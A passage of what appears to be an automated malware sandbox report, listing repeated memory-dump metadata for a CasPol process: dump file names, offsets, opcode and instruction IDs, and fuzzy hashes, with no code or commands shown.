
                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5726852686.000000001D2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1f75f4681fe4f27c3922724d116acf4e8f73693230b419608da5ffe6fb2aa292
                                                  • Instruction ID: 19f7332467bc4fc4a88906397850d32ac08edd879657928ebf57b555277c612d
                                                  • Opcode Fuzzy Hash: 1f75f4681fe4f27c3922724d116acf4e8f73693230b419608da5ffe6fb2aa292
                                                  • Instruction Fuzzy Hash: 11F1B874A46328CFCB65EF30D88868EB775BF49315F1081E9D41AA2354DB329E81CF56
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5726852686.000000001D2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 66054b56e3d57fbbc8e094eea23fa305720445c0d09f66a7a09fac21f85d6c97
                                                  • Instruction ID: 2368f73c2b41fc01581e19666bf781bd7951655bac3141cbd9cad80bb12de03b
                                                  • Opcode Fuzzy Hash: 66054b56e3d57fbbc8e094eea23fa305720445c0d09f66a7a09fac21f85d6c97
                                                  • Instruction Fuzzy Hash: 85F1C874A46328CFCBA5EF30D88868EB775BF49315F1081E9D41AA2354DB329E81CF56
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5726852686.000000001D2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6888349c382cb4cbe683440df5b0aefd0d47bcc5ac741ea9ec9e46b043375ac6
                                                  • Instruction ID: f9f64b700b31f9158ccd2a2098f409de71332290be14591260b0684c5d17a6e4
                                                  • Opcode Fuzzy Hash: 6888349c382cb4cbe683440df5b0aefd0d47bcc5ac741ea9ec9e46b043375ac6
                                                  • Instruction Fuzzy Hash: 1EF1C874A46328CFCBA5EF30D88868EB775BF49315F1081E9D41AA2354DB329E81CF56
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5726852686.000000001D2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 725c8ad35016194a98d323d6771095a5770cec56d5517b563bb54c104e070e54
                                                  • Instruction ID: 2921069dfd783be2c42862a12080b5fec31f639708626ce6c164a45e8fd7c6f9
                                                  • Opcode Fuzzy Hash: 725c8ad35016194a98d323d6771095a5770cec56d5517b563bb54c104e070e54
                                                  • Instruction Fuzzy Hash: 7BF1B874A46328CFCB65EF30D88868EB775BF49315F2081E9D41AA2354DB329E81CF56
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5726852686.000000001D2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: feeda01206457ae365903320b927b342808a854c2308250870adb7665d6f9aa6
                                                  • Instruction ID: fed4979a51e795df1ff5783ba8219038fae88b8d83af0dec45c9679f582e3a78
                                                  • Opcode Fuzzy Hash: feeda01206457ae365903320b927b342808a854c2308250870adb7665d6f9aa6
                                                  • Instruction Fuzzy Hash: 67E1C934A46328CFDB65EF30D88868EB775BF49315F2081E9D44AA2354CB329E81CF56
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5726852686.000000001D2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 92ac88978e7ab571588a7623a6e1dfc83503f8f22bc523429b8e14bbcba3adac
                                                  • Instruction ID: 7b70861cdd5376d5a7fedcf3068524a091e8b324005a19bce8a62502aaf198c7
                                                  • Opcode Fuzzy Hash: 92ac88978e7ab571588a7623a6e1dfc83503f8f22bc523429b8e14bbcba3adac
                                                  • Instruction Fuzzy Hash: AEE1B934A46328DFDBA5EF30D88868EB775BF49315F1041E9D45AA2354CB329E81CF16
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5726852686.000000001D2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ba5a8ddb9f55310f99ee44312a99fdbd54d1cd2085d19d0122be9346fa368418
                                                  • Instruction ID: 626f420f9b158e650b406b81b95de12b51e6d09300c05b3799583b68abb0b037
                                                  • Opcode Fuzzy Hash: ba5a8ddb9f55310f99ee44312a99fdbd54d1cd2085d19d0122be9346fa368418
                                                  • Instruction Fuzzy Hash: F9E1B934A46328CFDB65EF70D88868EB775BF49315F1081E9D44AA2354DB329E81CF16
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5726852686.000000001D2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 23b4ade8364e8d76d8596649892b617336e365748c55bb3ff6acccc377a4166a
                                                  • Instruction ID: 7e4a63c40a054dcb2da33ba26e4301dc1b2af580d549d4ab4f11df63d35cff40
                                                  • Opcode Fuzzy Hash: 23b4ade8364e8d76d8596649892b617336e365748c55bb3ff6acccc377a4166a
                                                  • Instruction Fuzzy Hash: DED1C834A46328CFDBA5EF30D88868EB775BF49315F1081E9D44AA2354CB329E81CF16
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5726852686.000000001D2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 53ed485819db1f5121c0d226fe9fa778c8c6441f85dc7c81d7612c5a4fe9e384
                                                  • Instruction ID: 2b01449d202a3166f90d8de4a64baef7647a046dee49f820ebbdb7fb19fda077
                                                  • Opcode Fuzzy Hash: 53ed485819db1f5121c0d226fe9fa778c8c6441f85dc7c81d7612c5a4fe9e384
                                                  • Instruction Fuzzy Hash: AFA19070E4470ACFDB40CFA9D885BDEBBF1BF58314F248129D425A7294EB759885CB82
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5726852686.000000001D2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b337e9ec3f963a399dc76a219eb76217958d806c64fc38a6f33f349bdb38ed95
                                                  • Instruction ID: 1a1d3d016fc1dfef0b95d6407c0504125c049f7b365709b9139a1221c10ca9fe
                                                  • Opcode Fuzzy Hash: b337e9ec3f963a399dc76a219eb76217958d806c64fc38a6f33f349bdb38ed95
                                                  • Instruction Fuzzy Hash: 67D1B934A46368CFCBA5EF30D88868EB775BF49315F1081E9D44AA2354DB329E81CF16
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5726852686.000000001D2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0ad562c96a211d7f24374c5be36822ffc91dd238d15619c73f57dd4d46fc0bdc
                                                  • Instruction ID: b5a6a2e82c083a85f21e5ec4b8759c8491b5c51910321fd39b79a7e3cb1133bb
                                                  • Opcode Fuzzy Hash: 0ad562c96a211d7f24374c5be36822ffc91dd238d15619c73f57dd4d46fc0bdc
                                                  • Instruction Fuzzy Hash: EBD1B834A46328CFCBA5EF30D88868EB775BF49315F2041E9D45AA2354CB329E85CF16
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5726852686.000000001D2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1c6a169b51b6eacc5c03208c594b5eee189bce0fc0d68f1fcc76e0d282f3290e
                                                  • Instruction ID: 1fe40d5f037fd8c6a8c3584393f4e5e0e86a4b2de9f44be5b64086b305d852d8
                                                  • Opcode Fuzzy Hash: 1c6a169b51b6eacc5c03208c594b5eee189bce0fc0d68f1fcc76e0d282f3290e
                                                  • Instruction Fuzzy Hash: 0EC1B834A46328CFCBA5EF30D88868EB775BF49315F2081E9D45AA2354CB325E85CF16
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5726852686.000000001D2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1950ab0a562aa0ebf1e460ab2fa49990996913b61005789e425b3b0eb1f7c721
                                                  • Instruction ID: 9092a03c46652803c2d51a5560cd63a3c3ef952cd2df6c0610961f58120ef9c4
                                                  • Opcode Fuzzy Hash: 1950ab0a562aa0ebf1e460ab2fa49990996913b61005789e425b3b0eb1f7c721
                                                  • Instruction Fuzzy Hash: 16C1B734A46328CFCBA5EF30D88868AB775BF49315F1081E9D45AA2354CB369E85CF16
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5726852686.000000001D2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 76a40ac2c930211eba56d65f06147fe1ac0bf593ae3c0752ce781358bea67f05
                                                  • Instruction ID: 8e1572bbd8b6bb8ffa8f25940534d46fa83b7c020732fbc6398b1f42b0cdb9bf
                                                  • Opcode Fuzzy Hash: 76a40ac2c930211eba56d65f06147fe1ac0bf593ae3c0752ce781358bea67f05
                                                  • Instruction Fuzzy Hash: A8C1B834A46328CFCB65EF30D88868AB775BF49315F2081E9D45AA3354CB329E85CF16
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5726852686.000000001D2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 793b316e72175478ab1970d4850a8d8a1d2b37176bf93910ace84a44ec6584f3
                                                  • Instruction ID: 293131aeef612b3ebbb4e5286bd6af33df284a1cdc1e7fa3ff217eacd195f6b9
                                                  • Opcode Fuzzy Hash: 793b316e72175478ab1970d4850a8d8a1d2b37176bf93910ace84a44ec6584f3
                                                  • Instruction Fuzzy Hash: 48C1B834A46728CFCBA5EF30D88868AB775BF49315F2081E9D41AA2354DB325E85CF16
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5726852686.000000001D2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 90c6a8632fdfcc28e525a1ece21d4a3ac131ca7d83316ac067f0edee491218f0
                                                  • Instruction ID: 3c3e16113f9a8382f8842e0718a72847af9b2076bfec317170f76dab15bfc82e
                                                  • Opcode Fuzzy Hash: 90c6a8632fdfcc28e525a1ece21d4a3ac131ca7d83316ac067f0edee491218f0
                                                  • Instruction Fuzzy Hash: 41B1B734A46728CFCB65EF30D88868AB775BF49315F2081E9D44AA2354DB329E85CF16
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5726852686.000000001D2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a9eeff2997c04c82383c3e8df21e0916b4861f7808f841a49e5ab838eeabff2c
                                                  • Instruction ID: 6512e1e62898cbdaf2927455f8b7c5dd3ecd6eb7fcbe66ee0cfe91976321cfd1
                                                  • Opcode Fuzzy Hash: a9eeff2997c04c82383c3e8df21e0916b4861f7808f841a49e5ab838eeabff2c
                                                  • Instruction Fuzzy Hash: 3CB1B734A46728CFCBA5EF30D88868AB775BF49315F1081E9D44AA2354DB329E85CF16
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5726852686.000000001D2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 23f26173a6038108eaf4e511a384fe89d3e651aa453d8ab67ea7dc8690f36297
                                                  • Instruction ID: a048c5ed53d8e6cd839df1680c33c4d75a6aab0631d5157a7118f9dc584ba69b
                                                  • Opcode Fuzzy Hash: 23f26173a6038108eaf4e511a384fe89d3e651aa453d8ab67ea7dc8690f36297
                                                  • Instruction Fuzzy Hash: 09B1C834A46328CFCB65EF30D88868AB775BF4A315F1081E9D41AA2354CB325E81CF16
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5726852686.000000001D2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e63a9c5e476b709afc21f088c39b0807985675351a416a4aa9fbb8d894e01fc0
                                                  • Instruction ID: ccfcaf7e431a3b000e3bfb5d10dc17c384bd49fedfd6d094657a7590fef88eb6
                                                  • Opcode Fuzzy Hash: e63a9c5e476b709afc21f088c39b0807985675351a416a4aa9fbb8d894e01fc0
                                                  • Instruction Fuzzy Hash: DCA1B834A46728CFCBA5EF30D88868AB775BF49315F2081E9D44AA2354DB325E85CF16
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5726852686.000000001D2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e9132abf97b3592ba26d0be9f278add80530fbf60d2476d7bd8c0163cbb44349
                                                  • Instruction ID: 0f91df0573b85b09fb6c9889731a117d49b1bd4c8ea0a1772c32b6b5140472fb
                                                  • Opcode Fuzzy Hash: e9132abf97b3592ba26d0be9f278add80530fbf60d2476d7bd8c0163cbb44349
                                                  • Instruction Fuzzy Hash: 52A1C934A46728CFCB65EF30D88868AB775BF49315F1082E9D44AA3354DB325E85CF16
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5726852686.000000001D2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 749a63fb4ebee44176246df4bcc3d203c9c9403423f0e2b85fd42edcb975ee4b
                                                  • Instruction ID: 6957b3b3d6f51a7025656b900b1cb81918fd4de5ccf98902f28994cf5f203053
                                                  • Opcode Fuzzy Hash: 749a63fb4ebee44176246df4bcc3d203c9c9403423f0e2b85fd42edcb975ee4b
                                                  • Instruction Fuzzy Hash: 4391C834A45728CFCB65EF30D88868AB775BF4A315F1082E9D44AA3354DB329E85CF16
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5726852686.000000001D2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 64f654b9459a4d3bff7d61b4307176b6254fdc2026e247030df850b3980ea636
                                                  • Instruction ID: 930419a0c00aaa926642726cbe1e177c32311ecdfac6fc2b95a2015176774e22
                                                  • Opcode Fuzzy Hash: 64f654b9459a4d3bff7d61b4307176b6254fdc2026e247030df850b3980ea636
                                                  • Instruction Fuzzy Hash: D891B834A45328CFCB65EF30D88868AB775BF4A315F1081E9D44AA3354DB325E85CF16
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5726852686.000000001D2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9b80e76b1844462f8a34ec23cdcc4f553f0af978bfab1867d3fcbd4baf7aaf1d
                                                  • Instruction ID: 53ff03550ff7a024a8ef343805c7073ff59ebbf98369c3d2a491c6c8673c7bd3
                                                  • Opcode Fuzzy Hash: 9b80e76b1844462f8a34ec23cdcc4f553f0af978bfab1867d3fcbd4baf7aaf1d
                                                  • Instruction Fuzzy Hash: 2E519035B012248FCB44EFB4C4986AE77BAAF8A259B21452CE116D7344DF36DC07CB99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5726852686.000000001D2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c2b5dadf48466b1525709cfff3a5e84176a4cfe7b80a5f13d8d95e616d292a98
                                                  • Instruction ID: 2f76d2e06b57f277e1ea17df6affce1e88b63eb03115b657d9973329d6efd34a
                                                  • Opcode Fuzzy Hash: c2b5dadf48466b1525709cfff3a5e84176a4cfe7b80a5f13d8d95e616d292a98
                                                  • Instruction Fuzzy Hash: F591B934A46328CFCB65EF30D88868AB775BF4A315F1082E9D45AA3354DB325E81CF16
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5726852686.000000001D2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e6364a549571cdcc50f490bd5ffe4f1073d0c74c472e857ac51580344eaef6e3
                                                  • Instruction ID: 966dd44189205659ec12c83e4f96a170da2b946adec0bead36257c566bc8d095
                                                  • Opcode Fuzzy Hash: e6364a549571cdcc50f490bd5ffe4f1073d0c74c472e857ac51580344eaef6e3
                                                  • Instruction Fuzzy Hash: 3F819834A46328CFCB65EF30D88868AB775BF4A315F2081E9D45AA3354DB325E85CF16
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5726852686.000000001D2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3e23371a402baa625d2b4703e42496b28a014fda8e10e431b9a0c7ef66e1be91
                                                  • Instruction ID: 7fcde574c1fceb766a1911c17e2641bcec6898920bd953892f175f8568fa2389
                                                  • Opcode Fuzzy Hash: 3e23371a402baa625d2b4703e42496b28a014fda8e10e431b9a0c7ef66e1be91
                                                  • Instruction Fuzzy Hash: 85819834A46328CFCB65EF30D88868AB775BF4A315F1081E9D45AA3354DB329E85CF16
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5726852686.000000001D2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 274f980cbf46664abef74f3b1ba4d58a4f3dcbba04da2485d80e53d1b525f4bb
                                                  • Instruction ID: dddbbf7e0b7f4013d5da51d53a352b16d47e25ea553d97b9a3cda93a8869906e
                                                  • Opcode Fuzzy Hash: 274f980cbf46664abef74f3b1ba4d58a4f3dcbba04da2485d80e53d1b525f4bb
                                                  • Instruction Fuzzy Hash: 1F71A934A46328CFCB65EF30D88868AB775BF4A315F1081E9D45AA3354DB325E85CF16
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5726852686.000000001D2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 28cf939f3e4c98088940ee2ee0ae4f46982ce6e98461398e0776bcb1f6bd2c2f
                                                  • Instruction ID: d140f5199d0a4d507495696156553b01d09caf53ced044e938659958005f9610
                                                  • Opcode Fuzzy Hash: 28cf939f3e4c98088940ee2ee0ae4f46982ce6e98461398e0776bcb1f6bd2c2f
                                                  • Instruction Fuzzy Hash: 9A512570D006198FDB44CFA9D885BEDBBB1FF48314F24812AD82ABB350D7749844DB96
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5726852686.000000001D2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fa633f4edb2d3cc961793e92c9c2df8d522cfb1fd7a208a6ef11ad70926f69dd
                                                  • Instruction ID: 10b2e7190f05907737daabcbbeac21af2effe72e8fe7ad75a4e6f1d4bc55877b
                                                  • Opcode Fuzzy Hash: fa633f4edb2d3cc961793e92c9c2df8d522cfb1fd7a208a6ef11ad70926f69dd
                                                  • Instruction Fuzzy Hash: 6371BA34A45368CFCBA5EF30D888689B775BF4A315F1081E9D45AA3354DB325E81CF16
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5726852686.000000001D2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 37e44b98f16050afe1b0c01bf4069b7193469009ce0b6dd61f6ed53428bece44
                                                  • Instruction ID: a2c880951aed927d7929cbf622447dc3327c00c121f1960a31793719f510b208
                                                  • Opcode Fuzzy Hash: 37e44b98f16050afe1b0c01bf4069b7193469009ce0b6dd61f6ed53428bece44
                                                  • Instruction Fuzzy Hash: 38514074D0064D8FEB60CF99C484BCEFBF5AF48314F208069D029AB261D775A94ACF92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5726852686.000000001D2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 38afc9bdb82717154c94b2e1d3d794792e525abbdc47e7b246252b96158be405
                                                  • Instruction ID: ef4bab9d57b5c43161afedf7463cc3b41bcb77eb5d002c88d631c9538b06b6ca
                                                  • Opcode Fuzzy Hash: 38afc9bdb82717154c94b2e1d3d794792e525abbdc47e7b246252b96158be405
                                                  • Instruction Fuzzy Hash: 40510470E007598FDB44CFA9C885BDDBBB1BF48314F248129E826BB351D774A844DB96
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5726852686.000000001D2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bf3cf4985607a102f73744728d409894e5a45be28c5c79fd31835872e61c5970
                                                  • Instruction ID: b5047d8a17f8175a14f96b3609a3d3fb961a1fa06807883a690b074112e119b3
                                                  • Opcode Fuzzy Hash: bf3cf4985607a102f73744728d409894e5a45be28c5c79fd31835872e61c5970
                                                  • Instruction Fuzzy Hash: 58510570E007598FDB44CFA9C885BDDBBB1BF48314F248129E826BB350D774A844DB96
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5726852686.000000001D2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0a4cd36e57ab88d2c4616763b4b01e4b8ef740a29f53136df3ff7c4075fa62cd
                                                  • Instruction ID: f17984e10f546cc4331f4aa2e6575dac9e597a7f8d271da0a0e52e8af02b116b
                                                  • Opcode Fuzzy Hash: 0a4cd36e57ab88d2c4616763b4b01e4b8ef740a29f53136df3ff7c4075fa62cd
                                                  • Instruction Fuzzy Hash: 0061BA34A46328CFCB65EF30D88868AB775BF4A315F1081E9D45AA3354DB325E85CF16
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
